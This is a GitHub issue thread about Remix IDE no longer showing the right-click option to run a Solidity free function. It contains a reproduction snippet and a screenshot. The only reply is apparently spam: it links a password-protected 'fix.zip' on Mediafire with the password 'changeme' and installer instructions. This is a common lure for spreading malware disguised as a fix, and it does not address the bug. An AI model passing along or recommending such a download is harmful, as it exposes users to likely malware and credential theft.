### ISSUE TITLE
Free Functions not in rt click menu

### ISSUE THREAD

**Issue by ryestew** [ethereum/remix-project#5134]
**Describe the bug**
When you rt-click on a free function, the option to run it should be in the popup menu.  I cant get it to work.

**To Reproduce**
1. see this medium post: https://medium.com/remix-ide/remix-ide-v0-32-0-release-3385255dccb2
2. using this function in a file but outside of a contract:

```function testRun() pure {
    console.log("test running a free function");
}
```

You used to see this popup menu but now the free function option is not there (when right clicking in a free function)
<img width="731" alt="image" src="https://github.com/user-attachments/assets/dec54766-afd6-4377-bee3-fb75541b1938">

**Comment by Bongton** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."
